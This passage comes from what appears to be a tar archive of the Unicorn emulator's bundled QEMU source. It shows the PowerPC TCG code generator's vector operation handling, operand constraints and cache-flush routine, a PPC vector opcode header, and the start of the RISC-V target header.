INDEX_op_shlv_vec: insn = shlv_op[vece]; break; case INDEX_op_shrv_vec: insn = shrv_op[vece]; break; case INDEX_op_sarv_vec: insn = sarv_op[vece]; break; case INDEX_op_and_vec: insn = VAND; break; case INDEX_op_or_vec: insn = VOR; break; case INDEX_op_xor_vec: insn = VXOR; break; case INDEX_op_andc_vec: insn = VANDC; break; case INDEX_op_not_vec: insn = VNOR; a2 = a1; break; case INDEX_op_orc_vec: insn = VORC; break; case INDEX_op_cmp_vec: switch (args[3]) { case TCG_COND_EQ: insn = eq_op[vece]; break; case TCG_COND_NE: insn = ne_op[vece]; break; case TCG_COND_GT: insn = gts_op[vece]; break; case TCG_COND_GTU: insn = gtu_op[vece]; break; default: g_assert_not_reached(); } break; case INDEX_op_bitsel_vec: tcg_out32(s, XXSEL | VRT(a0) | VRC(a1) | VRB(a2) | VRA(args[3])); return; case INDEX_op_dup2_vec: assert(TCG_TARGET_REG_BITS == 32); /* With inputs a1 = xLxx, a2 = xHxx */ tcg_out32(s, VMRGHW | VRT(a0) | VRA(a2) | VRB(a1)); /* a0 = xxHL */ tcg_out_vsldoi(s, TCG_VEC_TMP1, a0, a0, 8); /* tmp = HLxx */ tcg_out_vsldoi(s, a0, a0, TCG_VEC_TMP1, 8); /* a0 = HLHL */ return; case INDEX_op_ppc_mrgh_vec: insn = mrgh_op[vece]; break; case INDEX_op_ppc_mrgl_vec: insn = mrgl_op[vece]; break; case INDEX_op_ppc_muleu_vec: insn = muleu_op[vece]; break; case INDEX_op_ppc_mulou_vec: insn = mulou_op[vece]; break; case INDEX_op_ppc_pkum_vec: insn = pkum_op[vece]; break; case INDEX_op_ppc_rotl_vec: insn = rotl_op[vece]; break; case INDEX_op_ppc_msum_vec: tcg_debug_assert(vece == MO_16); tcg_out32(s, VMSUMUHM | VRT(a0) | VRA(a1) | VRB(a2) | VRC(args[3])); return; case INDEX_op_mov_vec: /* Always emitted via tcg_out_mov. */ case INDEX_op_dupi_vec: /* Always emitted via tcg_out_movi. */ case INDEX_op_dup_vec: /* Always emitted via tcg_out_dup_vec. */ default: g_assert_not_reached(); } tcg_debug_assert(insn != 0); tcg_out32(s, insn | VRT(a0) | VRA(a1) | VRB(a2)); } static void expand_vec_shi(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGArg imm, TCGOpcode opci) { TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); /* Splat w/bytes for xxspltib. */ tcg_gen_dupi_vec(tcg_ctx, MO_8, t1, imm & ((8 << vece) - 1)); vec_gen_3(tcg_ctx, opci, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t1)); tcg_temp_free_vec(tcg_ctx, t1); } static void expand_vec_cmp(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2, TCGCond cond) { bool need_swap = false, need_inv = false; tcg_debug_assert(vece <= MO_32 || have_isa_2_07); switch (cond) { case TCG_COND_EQ: case TCG_COND_GT: case TCG_COND_GTU: break; case TCG_COND_NE: if (have_isa_3_00 && vece <= MO_32) { break; } /* fall through */ case TCG_COND_LE: case TCG_COND_LEU: need_inv = true; break; case TCG_COND_LT: case TCG_COND_LTU: need_swap = true; break; case TCG_COND_GE: case TCG_COND_GEU: need_swap = need_inv = true; break; default: g_assert_not_reached(); } if (need_inv) { cond = tcg_invert_cond(cond); } if (need_swap) { TCGv_vec t1; t1 = v1, v1 = v2, v2 = t1; cond = tcg_swap_cond(cond); } vec_gen_4(tcg_ctx, INDEX_op_cmp_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2), cond); if (need_inv) { tcg_gen_not_vec(tcg_ctx, vece, v0, v0); } } static void expand_vec_mul(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2) { TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t3, t4; switch (vece) { case MO_8: case MO_16: vec_gen_3(tcg_ctx, INDEX_op_ppc_muleu_vec, type, vece, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mulou_vec, type, vece, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mrgh_vec, type, vece + 1, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mrgl_vec, type, vece + 1, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_pkum_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1)); break; case MO_32: tcg_debug_assert(!have_isa_2_07); t3 = tcg_temp_new_vec(tcg_ctx, type); t4 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dupi_vec(tcg_ctx, MO_8, t4, -16); vec_gen_3(tcg_ctx, INDEX_op_ppc_rotl_vec, type, MO_32, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v2), tcgv_vec_arg(tcg_ctx, t4)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mulou_vec, type, MO_16, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2)); tcg_gen_dupi_vec(tcg_ctx, MO_8, t3, 0); vec_gen_4(tcg_ctx, INDEX_op_ppc_msum_vec, type, MO_16, tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t3)); vec_gen_3(tcg_ctx, INDEX_op_shlv_vec, type, MO_32, tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, t4)); tcg_gen_add_vec(tcg_ctx, MO_32, v0, t2, t3); tcg_temp_free_vec(tcg_ctx, t3); tcg_temp_free_vec(tcg_ctx, t4); break; default: g_assert_not_reached(); } tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); } void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg a0, ...) { va_list va; TCGv_vec v0, v1, v2; TCGArg a2; va_start(va, a0); v0 = temp_tcgv_vec(tcg_ctx, arg_temp(a0)); v1 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); a2 = va_arg(va, TCGArg); switch (opc) { case INDEX_op_shli_vec: expand_vec_shi(tcg_ctx, type, vece, v0, v1, a2, INDEX_op_shlv_vec); break; case INDEX_op_shri_vec: expand_vec_shi(tcg_ctx, type, vece, v0, v1, a2, INDEX_op_shrv_vec); break; case INDEX_op_sari_vec: expand_vec_shi(tcg_ctx, type, vece, v0, v1, a2, INDEX_op_sarv_vec); break; case INDEX_op_cmp_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_cmp(tcg_ctx, type, vece, v0, v1, v2, va_arg(va, TCGArg)); break; case INDEX_op_mul_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_mul(tcg_ctx, type, vece, v0, v1, v2); break; default: g_assert_not_reached(); } va_end(va); } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef S_S = { .args_ct_str = { "S", "S" } }; static const TCGTargetOpDef r_ri = { .args_ct_str = { "r", "ri" } }; static const TCGTargetOpDef r_r_r = { .args_ct_str = { "r", "r", "r" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef L_L_L = { .args_ct_str = { "L", "L", "L" } }; static const TCGTargetOpDef S_S_S = { .args_ct_str = { "S", "S", "S" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_r_rT = { .args_ct_str = { "r", "r", "rT" } }; static const TCGTargetOpDef r_r_rU = { .args_ct_str = { "r", "r", "rU" } }; static const TCGTargetOpDef r_rI_ri = { .args_ct_str = { "r", "rI", "ri" } }; static const TCGTargetOpDef r_rI_rT = { .args_ct_str = { "r", "rI", "rT" } }; static const TCGTargetOpDef r_r_rZW = { .args_ct_str = { "r", "r", "rZW" } }; static const TCGTargetOpDef L_L_L_L = { .args_ct_str = { "L", "L", "L", "L" } }; static const TCGTargetOpDef S_S_S_S = { .args_ct_str = { "S", "S", "S", "S" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "ri", "rZ", "rZ" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef br2 = { .args_ct_str = { "r", "r", "ri", "ri" } }; static const TCGTargetOpDef setc2 = { .args_ct_str = { "r", "r", "r", "ri", "ri" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "r", "r", "rI", "rZM" } }; static const TCGTargetOpDef sub2 = { .args_ct_str = { "r", "r", "rI", "rZM", "r", "r" } }; static const TCGTargetOpDef v_r = { .args_ct_str = { "v", "r" } }; static const TCGTargetOpDef v_vr = { .args_ct_str = { "v", "vr" } }; static const TCGTargetOpDef v_v = { .args_ct_str = { "v", "v" } }; static const TCGTargetOpDef v_v_v = { .args_ct_str = { "v", "v", "v" } }; static const TCGTargetOpDef v_v_v_v = { .args_ct_str = { "v", "v", "v", "v" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_ctpop_i32: case INDEX_op_neg_i32: case INDEX_op_not_i32: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_extract_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: case INDEX_op_ctpop_i64: case INDEX_op_neg_i64: case INDEX_op_not_i64: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_extract_i64: return &r_r; case INDEX_op_add_i32: case INDEX_op_and_i32: case INDEX_op_or_i32: case INDEX_op_xor_i32: case INDEX_op_andc_i32: case INDEX_op_orc_i32: case INDEX_op_eqv_i32: case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: case INDEX_op_setcond_i32: case INDEX_op_and_i64: case INDEX_op_andc_i64: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_rotl_i64: case INDEX_op_rotr_i64: case INDEX_op_setcond_i64: return &r_r_ri; case INDEX_op_mul_i32: case INDEX_op_mul_i64: return &r_r_rI; case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_nand_i32: case INDEX_op_nor_i32: case INDEX_op_muluh_i32: case INDEX_op_mulsh_i32: case INDEX_op_orc_i64: case INDEX_op_eqv_i64: case INDEX_op_nand_i64: case INDEX_op_nor_i64: case INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_mulsh_i64: case INDEX_op_muluh_i64: return &r_r_r; case INDEX_op_sub_i32: return &r_rI_ri; case INDEX_op_add_i64: return &r_r_rT; case INDEX_op_or_i64: case INDEX_op_xor_i64: return &r_r_rU; case INDEX_op_sub_i64: return &r_rI_rT; case INDEX_op_clz_i32: case INDEX_op_ctz_i32: case INDEX_op_clz_i64: case INDEX_op_ctz_i64: return &r_r_rZW; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_ri; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: return &movc; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: return &dep; case INDEX_op_brcond2_i32: return &br2; case INDEX_op_setcond2_i32: return &setc2; case INDEX_op_add2_i64: case INDEX_op_add2_i32: return &add2; case INDEX_op_sub2_i64: case INDEX_op_sub2_i32: return &sub2; case INDEX_op_qemu_ld_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &r_L : &r_L_L); case INDEX_op_qemu_st_i32: return (TCG_TARGET_REG_BITS == 64 || TARGET_LONG_BITS == 32 ? &S_S : &S_S_S); case INDEX_op_qemu_ld_i64: return (TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS == 32 ? &L_L_L : &L_L_L_L); case INDEX_op_qemu_st_i64: return (TCG_TARGET_REG_BITS == 64 ? &S_S : TARGET_LONG_BITS == 32 ? &S_S_S : &S_S_S_S); case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_mul_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_orc_vec: case INDEX_op_cmp_vec: case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: case INDEX_op_ppc_mrgh_vec: case INDEX_op_ppc_mrgl_vec: case INDEX_op_ppc_muleu_vec: case INDEX_op_ppc_mulou_vec: case INDEX_op_ppc_pkum_vec: case INDEX_op_ppc_rotl_vec: case INDEX_op_dup2_vec: return &v_v_v; case INDEX_op_not_vec: case INDEX_op_neg_vec: return &v_v; case INDEX_op_dup_vec: return have_isa_3_00 ? &v_vr : &v_v; case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_dupm_vec: return &v_r; case INDEX_op_bitsel_vec: case INDEX_op_ppc_msum_vec: return &v_v_v_v; default: return NULL; } } static size_t dsize = 0; static size_t isize = 0; static void tcg_target_init(TCGContext *s) { unsigned long hwcap = qemu_getauxval(AT_HWCAP); unsigned long hwcap2 = qemu_getauxval(AT_HWCAP2); dsize = qemu_getauxval(AT_ICACHEBSIZE); isize = qemu_getauxval(AT_DCACHEBSIZE); have_isa = tcg_isa_base; if (hwcap & PPC_FEATURE_ARCH_2_06) { have_isa = tcg_isa_2_06; } #ifdef PPC_FEATURE2_ARCH_2_07 if (hwcap2 & PPC_FEATURE2_ARCH_2_07) { have_isa = tcg_isa_2_07; } #endif #ifdef PPC_FEATURE2_ARCH_3_00 if (hwcap2 & PPC_FEATURE2_ARCH_3_00) { have_isa = tcg_isa_3_00; } #endif #ifdef PPC_FEATURE2_HAS_ISEL /* Prefer explicit instruction from the kernel. */ have_isel = (hwcap2 & PPC_FEATURE2_HAS_ISEL) != 0; #else /* Fall back to knowing Power7 (2.06) has ISEL. */ have_isel = have_isa_2_06; #endif if (hwcap & PPC_FEATURE_HAS_ALTIVEC) { have_altivec = true; /* We only care about the portion of VSX that overlaps Altivec. */ if (hwcap & PPC_FEATURE_HAS_VSX) { have_vsx = true; } } s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff; s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffff; if (have_altivec) { s->tcg_target_available_regs[TCG_TYPE_V64] = 0xffffffff00000000ull; s->tcg_target_available_regs[TCG_TYPE_V128] = 0xffffffff00000000ull; } s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R7); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R12); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V7); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V8); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V9); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V10); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V11); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V12); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V13); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V14); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V15); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V16); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V17); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V18); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V19); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); /* tcg temp */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_R1); /* stack pointer */ #if defined(_CALL_SYSV) tcg_regset_set_reg(s->reserved_regs, TCG_REG_R2); /* toc pointer */ #endif #if defined(_CALL_SYSV) || TCG_TARGET_REG_BITS == 64 tcg_regset_set_reg(s->reserved_regs, TCG_REG_R13); /* thread pointer */ #endif tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP1); /* mem temp */ tcg_regset_set_reg(s->reserved_regs, TCG_VEC_TMP1); tcg_regset_set_reg(s->reserved_regs, TCG_VEC_TMP2); if (USE_REG_TB) { tcg_regset_set_reg(s->reserved_regs, TCG_REG_TB); /* tb->tc_ptr */ } } #ifdef __ELF__ typedef struct { DebugFrameCIE cie; DebugFrameFDEHeader fde; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[ARRAY_SIZE(tcg_target_callee_save_regs) * 2 + 3]; } DebugFrame; /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); #if TCG_TARGET_REG_BITS == 64 # define ELF_HOST_MACHINE EM_PPC64 #else # define ELF_HOST_MACHINE EM_PPC #endif static DebugFrame debug_frame = { .cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .cie.id = -1, .cie.version = 1, .cie.code_align = 1, .cie.data_align = (-SZR & 0x7f), /* sleb128 -SZR */ .cie.return_column = 65, /* Total FDE size does not include the "len" member. */ .fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_R1, /* DW_CFA_def_cfa r1, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { /* DW_CFA_offset_extended_sf, lr, LR_OFFSET */ 0x11, 65, (LR_OFFSET / -SZR) & 0x7f, } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { uint8_t *p = &debug_frame.fde_reg_ofs[3]; int i; for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i, p += 2) { p[0] = 0x80 + tcg_target_callee_save_regs[i]; p[1] = (FRAME_SIZE - (REG_SAVE_BOT + i * SZR)) / SZR; } debug_frame.fde.func_start = (uintptr_t)buf; debug_frame.fde.func_len = buf_size; tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } #endif /* __ELF__ */ void flush_icache_range(uintptr_t start, uintptr_t stop) { uintptr_t p, start1, stop1; start1 = start & ~(dsize - 1); stop1 = (stop + dsize - 1) & ~(dsize - 1); for (p = start1; p < stop1; p += dsize) { asm volatile ("dcbst 0,%0" : : "r"(p) : "memory"); } asm volatile ("sync" : : : "memory"); start &= start & ~(isize - 1); stop1 = (stop + isize - 1) & ~(isize - 1); for (p = start1; p < stop1; p += isize) { asm volatile ("icbi 0,%0" : : "r"(p) : "memory"); } asm volatile ("sync" : : : "memory"); asm volatile ("isync" : : : "memory"); } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/ppc/tcg-target.opc.h���������������������������������������������������������0000664�0000000�0000000�00000003032�14675241067�0020502�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2019 Linaro Limited * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * Target-specific opcodes for host vector expansion. These will be * emitted by tcg_expand_vec_op. For those familiar with GCC internals, * consider these to be UNSPEC with names. */ DEF(ppc_mrgh_vec, 1, 2, 0, IMPLVEC) DEF(ppc_mrgl_vec, 1, 2, 0, IMPLVEC) DEF(ppc_msum_vec, 1, 3, 0, IMPLVEC) DEF(ppc_muleu_vec, 1, 2, 0, IMPLVEC) DEF(ppc_mulou_vec, 1, 2, 0, IMPLVEC) DEF(ppc_pkum_vec, 1, 2, 0, IMPLVEC) DEF(ppc_rotl_vec, 1, 2, 0, IMPLVEC) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/riscv/�����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016056�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/riscv/tcg-target.h�����������������������������������������������������������0000664�0000000�0000000�00000013475�14675241067�0020302�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2018 SiFive, Inc * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef RISCV_TCG_TARGET_H #define RISCV_TCG_TARGET_H #if __riscv_xlen == 32 # define TCG_TARGET_REG_BITS 32 #elif __riscv_xlen == 64 # define TCG_TARGET_REG_BITS 64 #endif #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 20 #define TCG_TARGET_NB_REGS 32 typedef enum { TCG_REG_ZERO, TCG_REG_RA, TCG_REG_SP, TCG_REG_GP, TCG_REG_TP, TCG_REG_T0, TCG_REG_T1, TCG_REG_T2, TCG_REG_S0, TCG_REG_S1, TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, TCG_REG_A4, TCG_REG_A5, TCG_REG_A6, TCG_REG_A7, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, TCG_REG_S9, TCG_REG_S10, TCG_REG_S11, TCG_REG_T3, TCG_REG_T4, TCG_REG_T5, TCG_REG_T6, /* aliases */ TCG_AREG0 = TCG_REG_S0, TCG_GUEST_BASE_REG = TCG_REG_S1, TCG_REG_TMP0 = TCG_REG_T6, TCG_REG_TMP1 = TCG_REG_T5, TCG_REG_TMP2 = TCG_REG_T4, } TCGReg; /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_SP #define TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_CALL_ALIGN_ARGS 1 #define TCG_TARGET_CALL_STACK_OFFSET 0 /* optional instructions */ #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_movcond_i32 0 #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 1 #define TCG_TARGET_HAS_div2_i32 0 #define TCG_TARGET_HAS_rot_i32 0 #define TCG_TARGET_HAS_deposit_i32 0 #define TCG_TARGET_HAS_extract_i32 0 #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 (TCG_TARGET_REG_BITS == 32) #define TCG_TARGET_HAS_mulsh_i32 (TCG_TARGET_REG_BITS == 32) #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 0 #define TCG_TARGET_HAS_bswap32_i32 0 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_andc_i32 0 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 0 #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_direct_jump 0 #define TCG_TARGET_HAS_brcond2 1 #define TCG_TARGET_HAS_setcond2 1 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_movcond_i64 0 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 1 #define TCG_TARGET_HAS_div2_i64 0 #define TCG_TARGET_HAS_rot_i64 0 #define TCG_TARGET_HAS_deposit_i64 0 #define TCG_TARGET_HAS_extract_i64 0 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_extrl_i64_i32 